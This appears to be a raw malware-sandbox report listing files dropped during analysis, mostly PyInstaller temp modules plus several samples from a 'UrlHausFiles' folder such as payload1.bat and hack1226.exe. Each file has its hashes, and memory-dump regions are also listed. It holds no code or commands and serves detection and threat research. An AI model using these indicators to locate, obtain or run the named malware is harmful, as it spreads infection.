SHA512 567f703c2e45f13c6107d767597dba762dc5caa86024c87e7b28df2d6c77cd06d3f1f97eed45e6ef127d5346679fea89ac4dc2c453ce366b6233c0fa68d82692

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_decimal.pyd

MD5 d47e6acf09ead5774d5b471ab3ab96ff
SHA1 64ce9b5d5f07395935df95d4a0f06760319224a2
SHA256 d0df57988a74acd50b2d261e8b5f2c25da7b940ec2aafbee444c277552421e6e
SHA512 52e132ce94f21fa253fed4cf1f67e8d4423d8c30224f961296ee9f64e2c9f4f7064d4c8405cd3bb67d3cf880fe4c21ab202fa8cf677e3b4dad1be6929dbda4e2

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_cffi_backend.cp311-win_amd64.pyd

MD5 739d352bd982ed3957d376a9237c9248
SHA1 961cf42f0c1bb9d29d2f1985f68250de9d83894d
SHA256 9aee90cf7980c8ff694bb3ffe06c71f87eb6a613033f73e3174a732648d39980
SHA512 585a5143519ed9b38bb53f912cea60c87f7ce8ba159a1011cf666f390c2e3cc149e0ac601b008e039a0a78eaf876d7a3f64fff612f5de04c822c6e214bc2efde

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_bz2.pyd

MD5 4101128e19134a4733028cfaafc2f3bb
SHA1 66c18b0406201c3cfbba6e239ab9ee3dbb3be07d
SHA256 5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80
SHA512 4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_brotli.cp311-win_amd64.pyd

MD5 d9fc15caf72e5d7f9a09b675e309f71d
SHA1 cd2b2465c04c713bc58d1c5de5f8a2e13f900234
SHA256 1fcd75b03673904d9471ec03c0ef26978d25135a2026020e679174bdef976dcf
SHA512 84f705d52bd3e50ac412c8de4086c18100eac33e716954fbcb3519f4225be1f4e1c3643d5a777c76f7112fae30ce428e0ce4c05180a52842dacb1f5514460006

C:\Users\Admin\AppData\Local\Temp\_MEI23562\_asyncio.pyd

MD5 2859c39887921dad2ff41feda44fe174
SHA1 fae62faf96223ce7a3e6f7389a9b14b890c24789
SHA256 aebc378db08617ea81a0a3a3bc044bcc7e6303e314630392dd51bab12f879bd9
SHA512 790be0c95c81eb6d410e53fe8018e2ca5efd1838dc60539ebb011911c36c8478333ee95989cfd1ddaf4f892b537ae8305eb4cd893906930deae59c8965cf2fbb

C:\Users\Admin\AppData\Local\Temp\_MEI23562\unicodedata.pyd

MD5 bc58eb17a9c2e48e97a12174818d969d
SHA1 11949ebc05d24ab39d86193b6b6fcff3e4733cfd
SHA256 ecf7836aa0d36b5880eb6f799ec402b1f2e999f78bfff6fb9a942d1d8d0b9baa
SHA512 4aa2b2ce3eb47503b48f6a888162a527834a6c04d3b49c562983b4d5aad9b7363d57aef2e17fe6412b89a9a3b37fb62a4ade4afc90016e2759638a17b1deae6c

C:\Users\Admin\AppData\Local\Temp\_MEI23562\select.pyd

MD5 97ee623f1217a7b4b7de5769b7b665d6
SHA1 95b918f3f4c057fb9c878c8cc5e502c0bd9e54c0
SHA256 0046eb32f873cde62cf29af02687b1dd43154e9fd10e0aa3d8353d3debb38790
SHA512 20edc7eae5c0709af5c792f04a8a633d416da5a38fc69bd0409afe40b7fb1afa526de6fe25d8543ece9ea44fd6baa04a9d316ac71212ae9638bdef768e661e0f

C:\Users\Admin\AppData\Local\Temp\_MEI23562\pyexpat.pyd

MD5 1c0a578249b658f5dcd4b539eea9a329
SHA1 efe6fa11a09dedac8964735f87877ba477bec341
SHA256 d97f3e27130c267e7d3287d1b159f65559e84ead9090d02a01b4c7dc663cd509
SHA512 7b21dcd7b64eeba13ba8a618960190d1a272fa4805dedcf8f9e1168aebfe890b0ced991435ecbd353467a046fc0e8307f9a9be1021742d7d93aa124c52cc49e6

C:\Users\Admin\AppData\Local\Temp\_MEI23562\libssl-1_1.dll

MD5 8769adafca3a6fc6ef26f01fd31afa84
SHA1 38baef74bdd2e941ccd321f91bfd49dacc6a3cb6
SHA256 2aebb73530d21a2273692a5a3d57235b770daf1c35f60c74e01754a5dac05071
SHA512 fac22f1a2ffbfb4789bdeed476c8daf42547d40efe3e11b41fadbc4445bb7ca77675a31b5337df55fdeb4d2739e0fb2cbcac2feabfd4cd48201f8ae50a9bd90b

C:\Users\Admin\AppData\Local\Temp\_MEI23562\libcrypto-1_1.dll

MD5 6f4b8eb45a965372156086201207c81f
SHA1 8278f9539463f0a45009287f0516098cb7a15406
SHA256 976ce72efd0a8aeeb6e21ad441aa9138434314ea07f777432205947cdb149541
SHA512 2c5c54842aba9c82fb9e7594ae9e264ac3cbdc2cc1cd22263e9d77479b93636799d0f28235ac79937070e40b04a097c3ea3b7e0cd4376a95ed8ca90245b7891f

C:\Users\Admin\AppData\Local\Temp\_MEI23562\libffi-8.dll

MD5 32d36d2b0719db2b739af803c5e1c2f5
SHA1 023c4f1159a2a05420f68daf939b9ac2b04ab082
SHA256 128a583e821e52b595eb4b3dda17697d3ca456ee72945f7ecce48ededad0e93c
SHA512 a0a68cfc2f96cb1afd29db185c940e9838b6d097d2591b0a2e66830dd500e8b9538d170125a00ee8c22b8251181b73518b73de94beeedd421d3e888564a111c1

C:\Users\Admin\AppData\Local\Temp\_MEI23562\setuptools\_vendor\jaraco\text\Lorem ipsum.txt

MD5 4ce7501f6608f6ce4011d627979e1ae4
SHA1 78363672264d9cd3f72d5c1d3665e1657b1a5071
SHA256 37fedcffbf73c4eb9f058f47677cb33203a436ff9390e4d38a8e01c9dad28e0b
SHA512 a4cdf92725e1d740758da4dd28df5d1131f70cef46946b173fe6956cc0341f019d7c4fecc3c9605f354e1308858721dada825b4c19f59c5ad1ce01ab84c46b24

C:\Users\Admin\AppData\Local\Temp\_MEI23562\charset_normalizer\md.cp311-win_amd64.pyd

MD5 cbf62e25e6e036d3ab1946dbaff114c1
SHA1 b35f91eaf4627311b56707ef12e05d6d435a4248
SHA256 06032e64e1561251ea3035112785f43945b1e959a9bf586c35c9ea1c59585c37
SHA512 04b694d0ae99d5786fa19f03c5b4dd8124c4f9144cfe7ca250b48a3c0de0883e06a6319351ae93ea95b55bbbfa69525a91e9407478e40ad62951f1d63d45ff18

C:\Users\Admin\AppData\Local\Temp\_MEI23562\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

MD5 bac273806f46cffb94a84d7b4ced6027
SHA1 773fbc0435196c8123ee89b0a2fc4d44241ff063
SHA256 1d9aba3ff1156ea1fbe10b8aa201d4565ae6022daf2117390d1d8197b80bb70b
SHA512 eaec1f072c2c0bc439ac7b4e3aea6e75c07bd4cd2d653be8500bbffe371fbfe045227daead653c162d972ccaadff18ac7da4d366d1200618b0291d76e18b125c

C:\Users\Admin\AppData\Local\Temp\_MEI23562\certifi\cacert.pem

MD5 50ea156b773e8803f6c1fe712f746cba
SHA1 2c68212e96605210eddf740291862bdf59398aef
SHA256 94edeb66e91774fcae93a05650914e29096259a5c7e871a1f65d461ab5201b47
SHA512 01ed2e7177a99e6cb3fbef815321b6fa036ad14a3f93499f2cb5b0dae5b713fd2e6955aa05f6bda11d80e9e0275040005e5b7d616959b28efc62abb43a3238f0

C:\Users\Admin\AppData\Local\Temp\_MEI23562\yarl\_quoting_c.cp311-win_amd64.pyd

MD5 1c6c610e5e2547981a2f14f240accf20
SHA1 4a2438293d2f86761ef84cfdf99a6ca86604d0b8
SHA256 4a982ff53e006b462ddf7090749bc06ebb6e97578be04169489d27e93f1d1804
SHA512 f6ea205a49bf586d7f3537d56b805d34584a4c2c7d75a81c53ce457a4a438590f6dbeded324362bfe18b86ff5696673de5fbe4c9759ad121b5e4c9ae2ef267c0

C:\Users\Admin\AppData\Local\Temp\_MEI23562\propcache\_helpers_c.cp311-win_amd64.pyd

MD5 04444380b89fb22b57e6a72b3ae42048
SHA1 cfe9c662cb5ca1704e3f0763d02e0d59c5817d77
SHA256 d123d7fefde551c82eb61454d763177322e5ce1eaa65dc489e19de5ab7faf7b4
SHA512 9e7d367bab0f6cc880c5870fdcdb06d9a9e5eb24eba489ca85549947879b0fa3c586779ffcea0fca4c50aa67dad098e7bd9e82c00e2d00412d9441991267d2da

C:\Users\Admin\AppData\Local\Temp\_MEI23562\multidict\_multidict.cp311-win_amd64.pyd

MD5 ecc0b2fcda0485900f4b72b378fe4303
SHA1 40d9571b8927c44af39f9d2af8821f073520e65a
SHA256 bcbb43ce216e38361cb108e99bab86ae2c0f8930c86d12cadfca703e26003cb1
SHA512 24fd07eb0149cb8587200c055f20ff8c260b8e626693c180cba4e066194bed7e8721dde758b583c93f7cb3d691b50de6179ba86821414315c17b3d084d290e70

C:\Users\Admin\Downloads\UrlHausFiles\aycYmgG.exe

MD5 e3eb0a1df437f3f97a64aca5952c8ea0
SHA1 7dd71afcfb14e105e80b0c0d7fce370a28a41f0a
SHA256 38ffd4972ae513a0c79a8be4573403edcd709f0f572105362b08ff50cf6de521
SHA512 43573b0cbaac6e2e1646e6217d2d10c40ad10b9db1f4492d6740545e793c891b5e39283a082896c0392b88eb319dfa9392421b1c89c094c9ce9f31b53d37ebaf

C:\Users\Admin\Downloads\UrlHausFiles\26.ps1

MD5 6c7bb2eade7ae01218c2e33fc7d30d1f
SHA1 1b089598277fec6a2b2026354add723930feafba
SHA256 d831a7e21ea3c1bcb7ab4b5a21f01dd20b04e1999eb934e17ac50bcdfbcef68c
SHA512 709d364045dbacab00d0da4916b9752253af275e1532309f869afe7ad4e11984c3ed10de46cf08b999ffbb9d677f08d3cfc419fc2a731933c333b43177e5e1bd

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

MD5 2697c90051b724a80526c5b8b47e5df4
SHA1 749d44fe2640504f15e9bf7b697f1017c8c2637d
SHA256 f8b23a264f58e9001e087af2bf48eed5938db31b5b1b20d973575cfa6a121355
SHA512 d0c8d76699f2f88d76eeaf211e59a780969b7692b513495a34013af8380d3fe0616caf03c6e47b8e7721d2f0a369c1dd20860b755b7d607783a99080c5f5315b

C:\Users\Admin\Downloads\UrlHausFiles\PowerShell.exe

MD5 df4465e6693e489c6db32a427bbd93ec
SHA1 ea8ef0ae2b517e10f934b66ebefa71e2d9007aa5
SHA256 0c5031bae18c7e5b294b89b4b82e30c3862d1e5e4aa5fd664d7a04451dc83847
SHA512 4d569c1c29adadf32ff28ba53378493189c99e6e1734e1c896e52e6df89358cbfc6525a96ae1d5cbd99a909ffb7d8e88b075674f679a448a54fef961cdc16f5d

C:\Users\Admin\Downloads\UrlHausFiles\payload1.bat

MD5 c5fb4d9422b14a3a05ec89582eeb3758
SHA1 be0c09399ed4f66781661ff8d434738f0dc9c95d
SHA256 07dcc4cf3f9f7fc5a74a1539e385ff54fc840c9cd0c8bc2008e54d01070e066b
SHA512 dc79503691d44a65b6503e2b5bced29eba5c3069ac1ff07c5478a5ad4597f4baf62490eebe036e975fc542b0010d78d2a78c26a48ac648f9452337047c0bdf6b

memory/1028-150-0x00000000006C0000-0x00000000006CE000-memory.dmp

memory/5012-154-0x00000289204E0000-0x0000028920502000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_de5mhaal.1bs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe

MD5 24453759fc86d34383bd0ffc722bbfb5
SHA1 495fa07508f0e79d9ce26f9179285d41303ce402
SHA256 ff4bc7221036ee331d8b913f12aec34493c11b6c2655dc15cf4281a6306126ab
SHA512 aad86f8232a676e1705319f0da2c45a89b533ecf5e8bcbc95d610683247f028b57ae7bf8b791468f6ce9b34962778cec205b48c4612c95c82967bb223ad30db9

memory/3220-173-0x0000000000290000-0x000000000029E000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\COMSurrogate.exe

MD5 77334f046a50530cdc6e585e59165264
SHA1 657a584eafe86df36e719526d445b570e135d217
SHA256 eb6c487307c52793e0bc4d6a74770bbea2322f32edc466b25abacec3dd0e9c08
SHA512 97936dd74d7eef8d69dae0d83b6d1554bd54d5302b5b2ff886ff66c040b083d7d086089de12b57a491cf7269a7d076e4d2a52839aaac519386b77297bc3a5c90

memory/4684-183-0x0000016ADCF90000-0x0000016ADCFBE000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

MD5 40b887735996fc88f47650c322273a25
SHA1 e2f583114fcd22b2083ec78f42cc185fb89dd1ff
SHA256 d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
SHA512 5dd81a17725c0fb9dae4341e4d5f46ba1035fdba2786a15b5288b4281cd7b0741889a6813da2f797a2581fed08d0f407b6fad0315bdac50ff62c94cb7a7ead13

memory/1332-193-0x0000000004FC0000-0x0000000004FF6000-memory.dmp

memory/1332-194-0x0000000005630000-0x0000000005C58000-memory.dmp

memory/1332-195-0x00000000055B0000-0x00000000055D2000-memory.dmp

memory/1332-196-0x0000000005E90000-0x0000000005EF6000-memory.dmp

memory/1332-197-0x0000000005F00000-0x0000000005F66000-memory.dmp

C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe

MD5 d259a1c0c84bbeefb84d11146bd0ebe5
SHA1 feaceced744a743145af4709c0fccf08ed0130a0
SHA256 8de12184a006d3340241492baca0ba1034182b08d3c6a0f09c0af99d539bd48b
SHA512 84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54

memory/1156-216-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1332-217-0x0000000006100000-0x0000000006454000-memory.dmp

memory/1332-218-0x0000000006500000-0x000000000651E000-memory.dmp

memory/1332-221-0x0000000006A30000-0x0000000006A7C000-memory.dmp